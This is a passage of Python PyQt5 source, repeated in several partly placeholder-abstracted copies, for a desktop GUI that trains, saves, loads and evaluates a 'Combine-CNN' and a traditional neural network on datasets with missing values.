self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n return\n\n def loadData(self):\n if self.sender() is self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'],\n self.dataLossRate['New'], self.dataSetLossValue['New'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],\n self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n\n def preProcess(self):\n if self.dataFor['Tra'] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n self.dataFor['Tra'].MeanPreProcess()\n reply = QMessageBox.information(self, 'Message',\n 'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes)\n return\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n\n def training(self):\n if self.sender() is self.trainingButton:\n if self.trainingW is not None:\n self.trainingW.hide()\n self.trainingW.show()\n return\n senderName = 'New'\n elif self.sender() is self.trainingButtonT:\n if self.trainingWT is not None:\n self.trainingWT.hide()\n self.trainingWT.show()\n senderName = 'Tra'\n if self.dataFor[senderName] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n elif senderName == 'New':\n if self.dataFor[senderName].DataTrainX.shape[1\n ] < self.combineNumConv:\n reply = QMessageBox.information(self, '参数错误',\n '卷积层组合(卷积核)大小大于数据集特征数量', QMessageBox.Yes, QMessageBox.Yes)\n return\n if combineNumCalculate.combineNumCal(self.dataFor[senderName].\n DataTrainX.shape[1], self.combineNumConv\n ) < self.combineNumPooling:\n reply = QMessageBox.information(self, '参数错误',\n '池化层组合(池化核)大小大于卷积层输出特征向量维度', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n if self.trainingWT is not None:\n reply = QMessageBox.information(self, '提示',\n 'traditional NN训练正在进行,请等待其结束', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练',\n self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n elif senderName == 'Tra':\n if self.trainingW is not None:\n reply = QMessageBox.information(self, '提示',\n 'combine-CNN训练正在进行,请等待其结束', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练'\n , self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n return\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n def showResult(self):\n if self.sender() is self.showResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'combine-CNN预测结果展示', self, 'New')\n elif self.sender() is self.showResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'traditional NN预测结果展示', self, 'Tra')\n return\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.windowLength = 1250\n self.windowHigh = 900\n self.fname = dict()\n self.fname['New'] = None\n self.fname['Tra'] = None\n self.dataLossRate = dict()\n self.dataSetLossValue = dict()\n self.dataFor = dict()\n self.dataFor['New'] = None\n self.dataLossRate['New'] = 0.0\n self.dataSetLossValue['New'] = 0.0\n self.dataFor['Tra'] = None\n self.dataLossRate['Tra'] = 0.0\n self.dataSetLossValue['Tra'] = 0.0\n self.traingWidgetOnFlag = dict()\n self.traingWidgetOnFlag['New'] = False\n self.traingWidgetOnFlag['Tra'] = False\n self.combineNumConv = 2\n self.convCoreNum = 5\n self.combineNumPooling = 4\n self.fullConnectOutInRate = 0.5\n self.mcbcnn = None\n self.trann = None\n self.trainingW = None\n self.trainingWT = None\n self.initUI()\n self.initConnect()\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n return\n\n def loadData(self):\n if self.sender() is self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'],\n self.dataLossRate['New'], self.dataSetLossValue['New'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],\n self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n\n def preProcess(self):\n if self.dataFor['Tra'] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n self.dataFor['Tra'].MeanPreProcess()\n reply = QMessageBox.information(self, 'Message',\n 'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes)\n return\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n def showResult(self):\n if self.sender() is self.showResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'combine-CNN预测结果展示', self, 'New')\n elif self.sender() is self.showResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'traditional NN预测结果展示', self, 'Tra')\n return\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.windowLength = 1250\n self.windowHigh = 900\n self.fname = dict()\n self.fname['New'] = None\n self.fname['Tra'] = None\n self.dataLossRate = dict()\n self.dataSetLossValue = dict()\n self.dataFor = dict()\n self.dataFor['New'] = None\n self.dataLossRate['New'] = 0.0\n self.dataSetLossValue['New'] = 0.0\n self.dataFor['Tra'] = None\n self.dataLossRate['Tra'] = 0.0\n self.dataSetLossValue['Tra'] = 0.0\n self.traingWidgetOnFlag = dict()\n self.traingWidgetOnFlag['New'] = False\n self.traingWidgetOnFlag['Tra'] = False\n self.combineNumConv = 2\n self.convCoreNum = 5\n self.combineNumPooling = 4\n self.fullConnectOutInRate = 0.5\n self.mcbcnn = None\n self.trann = None\n self.trainingW = None\n self.trainingWT = None\n self.initUI()\n self.initConnect()\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = 